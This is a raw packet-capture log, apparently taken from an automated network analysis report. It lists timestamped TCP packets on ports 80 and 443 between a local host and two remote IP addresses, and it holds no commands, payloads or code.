                                                                                                                                                                                  Nov 23, 2024 19:52:46.760412931 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.760469913 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.760493994 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.761456966 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.761526108 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.761575937 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.762566090 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.762617111 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.762658119 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.763616085 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.763722897 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.763739109 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.764733076 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.764846087 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.764887094 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.765819073 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.765922070 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.765945911 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.766895056 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.766942024 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.767007113 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.767986059 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.768121004 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.768146992 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.768663883 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.769061089 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.769128084 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.769160032 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.770148993 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.770210028 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.770270109 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.771279097 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.771339893 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.771363974 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.772296906 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.772388935 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.772408962 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.773401022 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.773464918 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.773495913 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.817832947 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.825771093 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.839478016 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.927908897 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.927968979 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.928026915 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.928318977 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.928422928 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.928554058 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.929230928 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.929357052 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.929667950 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.930156946 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.930520058 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.930604935 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.930612087 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.931411028 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.931523085 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.931524038 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.932344913 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.932419062 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.932454109 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.933306932 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.933361053 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.933410883 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.934274912 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.934331894 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.934334040 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.935194016 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.935336113 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.935462952 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.936134100 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.936196089 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.936249018 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.937097073 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.937196970 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.937263012 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.938123941 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.938257933 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.938266993 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.938973904 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.939018965 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.939069986 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.939910889 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.940018892 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.940049887 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.940853119 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.940907955 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.940948009 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.941828966 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.941947937 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.941971064 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.942714930 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.942792892 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.942805052 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.943658113 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.943713903 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.943757057 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.944667101 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.944724083 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.944734097 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.945563078 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.945677996 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.945698977 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.946494102 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.946656942 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.946666002 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.947691917 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.947746038 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.947828054 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.948399067 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.948450089 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.948540926 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.949326992 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.949434996 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.949464083 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.950376987 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.950511932 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.950586081 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.951215029 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.951316118 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.951329947 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.952187061 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.952239037 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.952306986 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.953119040 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.953213930 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.953231096 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.954026937 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.954116106 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.954138994 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.954988956 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.955041885 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.955122948 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.955924034 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.955945015 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.956032038 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.956882000 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.957040071 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.957057953 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.957798958 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.957861900 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.957914114 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.958729982 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.958780050 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.958853006 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.959705114 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.959749937 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.959803104 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.960638046 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.960710049 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.960736990 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.961591005 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.961643934 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.961714029 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.962156057 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.962522030 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.962657928 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.962750912 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.963460922 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.963570118 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.963624954 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.964402914 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.964443922 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.964512110 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.965343952 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.965502977 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.965528965 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.966279030 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.966331005 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.966392040 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.967338085 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.967468023 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.967468977 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.968530893 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.968585014 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.968607903 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.969189882 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.969259024 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.969260931 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.970077038 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.970123053 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.970218897 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.970989943 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.971103907 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.971116066 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.971952915 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.972028017 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.972048998 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.972886086 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.972966909 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.972986937 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.973828077 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.973886013 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.977999926 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.978112936 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.978163958 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.978456020 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.978544950 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.979396105 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.979482889 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.979487896 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:46.979562044 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:46.980307102 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.001557112 CET4434976513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.002068043 CET49765443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:47.002094984 CET4434976513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.002602100 CET49765443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:47.002614021 CET4434976513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.004892111 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.121915102 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.121992111 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.122045040 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:47.122268915 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:47.122268915 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:47.122292995 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.122301102 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.125772953 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:47.125812054 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.125885963 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:47.126051903 CET49769443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:47.126064062 CET4434976913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.138506889 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.138526917 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.138753891 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.138824940 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.138896942 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.139065981 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.139878988 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.140019894 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.140284061 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.140733004 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.140988111 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.141153097 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.141866922 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.141940117 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.142057896 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.142203093 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.142889977 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.143021107 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.143033981 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.143832922 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.143937111 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.143949986 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.144792080 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.144872904 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.144879103 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.145768881 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.145873070 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.145904064 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.146806002 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.146859884 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.146874905 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.147685051 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.147696972 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.147751093 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.148597002 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.148638010 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.148654938 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.149544001 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.149555922 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.149645090 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.150476933 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.150599003 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.150671959 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.151364088 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.151428938 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.151463985 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.152319908 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.152390003 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.152468920 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.153259993 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.153367996 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.153425932 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.154230118 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.154320002 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.154325962 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.155258894 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.155513048 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.155565977 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.156166077 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.156235933 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.156271935 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.157121897 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.157233953 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.157289982 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:47.158320904 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:47.158365965 CET8049760185.215.113.16192.168.2.7
